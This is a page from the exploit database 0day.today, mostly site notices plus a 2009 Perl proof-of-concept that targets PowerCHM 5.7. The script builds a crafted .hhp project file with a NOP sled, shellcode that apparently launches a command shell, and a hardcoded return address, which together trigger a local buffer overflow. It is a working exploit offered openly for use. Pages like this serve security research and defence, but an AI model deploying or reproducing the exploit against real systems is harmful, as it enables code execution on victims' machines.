0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
================================================ PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit ================================================ #!/usr/bin/perl # # Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit # # Summary: With PowerCHM you can create your CHM files # automatically from Html Files (including .htm, .html # and .mht), Text Files (.txt), Microsoft Word Documents # (.doc) and Adobe Acrobat Document (.pdf). # # Product web page: http://www.dawningsoft.com/products/powerchm.htm # # Tested on WinXP Pro SP2 (English) # # Refs: http://www.milw0rm.com/exploits/8300 # http://security.biks.vn/?p=365 # # Exploit by Gjoko 'LiquidWorm' Krstic # # liquidworm gmail com # # http://www.zeroscience.org/ # # 28.03.2009 # my $header=" [OPTIONS]\n Compatibility=1.1 or later\n Compiled file=zero.chm\n Contents file=science.hhc\n Index file=lqwrm.hhk\n Binary Index=Yes\n Language=0x042F\n Title=\n Error log file=Errlog.txt\n Default Window=main\n\n [WINDOWS]\n main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n [FILES]\n\n [INFOTYPES]\n "; my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45". "\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D". "\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0"; my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500; my $file = "Watchmen.hhp"; open (hhp, ">./$file") || die "\nCan't open $file: $!"; print hhp "$header" . "$bof"; close (hhp); sleep 1; print "\nFile $file successfully created!\n"; # 0day.today [2024-12-25] #